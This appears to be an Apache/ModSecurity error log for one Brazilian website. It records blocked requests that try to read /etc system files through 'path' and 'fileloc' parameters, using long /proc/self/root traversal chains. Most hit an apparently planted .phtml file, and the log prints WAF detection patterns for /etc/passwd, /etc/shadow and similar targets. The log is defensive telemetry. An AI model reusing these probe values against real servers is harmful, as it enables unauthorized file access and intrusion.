[Fri Mar 20 08:59:22.430944 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:35978] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02muoXxyEfFpUF8f-L8gAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:22.698984 2026] [:error] [pid 9818:tid 140411716749056] [client 57.141.18.105:35128] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02ml1pVZ5mVmJwsFM9FwAAAEM"]
[Fri Mar 20 08:59:23.039447 2026] [:error] [pid 10189:tid 140411708356352] [client 57.141.18.105:35142] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02mzJ3M9BSuKP7CAYqeAAAAIQ"]
[Fri Mar 20 08:59:23.452928 2026] [:error] [pid 7893:tid 140411725141760] [client 57.141.18.1:35152] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02mxCii7xarUs8iHZy5AAAAgI"]
[Fri Mar 20 08:59:24.187427 2026] [:error] [pid 11167:tid 140411607643904] [client 57.141.18.1:35172] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02nPHIg5MgXLBnicMCXAAAAdA"]
[Fri Mar 20 08:59:24.194301 2026] [:error] [pid 11642:tid 140411548894976] [client 57.141.18.21:35174] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02nLninkcc-iUj5AppfQAAA5c"]
[Fri Mar 20 08:59:24.575383 2026] [:error] [pid 11642:tid 140411557287680] [client 57.141.18.54:35134] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02nLninkcc-iUj5AppfgAAA5Y"]
[Fri Mar 20 08:59:24.686989 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.243.128:35982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02nPXLqtnMIWvjpaKmEgAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:24.849165 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.31:35192] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02nNa6ubjKNq_cu4bhxgAAA04"]
[Fri Mar 20 08:59:25.336381 2026] [:error] [pid 31215:tid 140411641214720] [client 57.141.18.84:35208] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02nQF0L0L-SsrnPo50RgAAAsw"]
[Fri Mar 20 08:59:25.545157 2026] [:error] [pid 15826:tid 140411590858496] [client 57.141.18.28:35214] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02neoXxyEfFpUF8f-L8wAAAVI"]
[Fri Mar 20 08:59:26.008653 2026] [:error] [pid 9818:tid 140411590858496] [client 57.141.18.99:35222] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02nl1pVZ5mVmJwsFM9GQAAAFI"]
[Fri Mar 20 08:59:26.336890 2026] [:error] [pid 7235:tid 140411607643904] [client 57.141.18.93:35244] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02nvqxLDW4GITHUkT06gAAARA"]
[Fri Mar 20 08:59:26.652690 2026] [:error] [pid 31215:tid 140411691570944] [client 57.141.18.86:35272] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02ngF0L0L-SsrnPo50SAAAAsY"]
[Fri Mar 20 08:59:27.302564 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.243.128:35988] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02n_qxLDW4GITHUkT07AAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:27.411235 2026] [:error] [pid 11642:tid 140411574073088] [client 57.141.18.108:35316] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02n7ninkcc-iUj5AppgAAAA5Q"]
[Fri Mar 20 08:59:29.019702 2026] [:error] [pid 11642:tid 140411666392832] [client 57.141.18.17:35284] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02n7ninkcc-iUj5AppgQAAA4k"]
[Fri Mar 20 08:59:29.020996 2026] [:error] [pid 11167:tid 140411548894976] [client 57.141.18.87:35342] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02n_HIg5MgXLBnicMCXgAAAdc"]
[Fri Mar 20 08:59:29.025496 2026] [:error] [pid 7893:tid 140411582465792] [client 57.141.18.20:35350] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02oBCii7xarUs8iHZy6wAAAhM"]
[Fri Mar 20 08:59:29.025813 2026] [:error] [pid 21219:tid 140411599251200] [client 57.141.18.6:35348] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02oPXLqtnMIWvjpaKmFwAAApE"]
[Fri Mar 20 08:59:29.340194 2026] [:error] [pid 21219:tid 140411666392832] [client 57.141.18.56:35388] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02ofXLqtnMIWvjpaKmGQAAAok"]
[Fri Mar 20 08:59:29.575998 2026] [:error] [pid 10189:tid 140411624429312] [client 57.141.18.11:35396] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02oTJ3M9BSuKP7CAYqfgAAAI4"]
[Fri Mar 20 08:59:29.839461 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.61:35416] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02oV1pVZ5mVmJwsFM9HwAAAFc"]
[Fri Mar 20 08:59:30.256523 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.13:35428] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02ouoXxyEfFpUF8f-L9wAAAU8"]
[Fri Mar 20 08:59:30.393828 2026] [:error] [pid 10189:tid 140411674785536] [client 57.141.18.21:35438] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02ojJ3M9BSuKP7CAYqfwAAAIg"]
[Fri Mar 20 08:59:30.506090 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:35992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab02ohCii7xarUs8iHZy7gAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:59:30.679677 2026] [mime_magic:error] [pid 26799:tid 140411716749056] (70014)End of file found: [client 74.7.241.31:48116] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/bin/update-ca-trust&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/bin
[Fri Mar 20 08:59:30.899389 2026] [:error] [pid 31215:tid 140411699963648] [client 57.141.18.108:35466] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab02ogF0L0L-SsrnPo50SgAAAsU"]
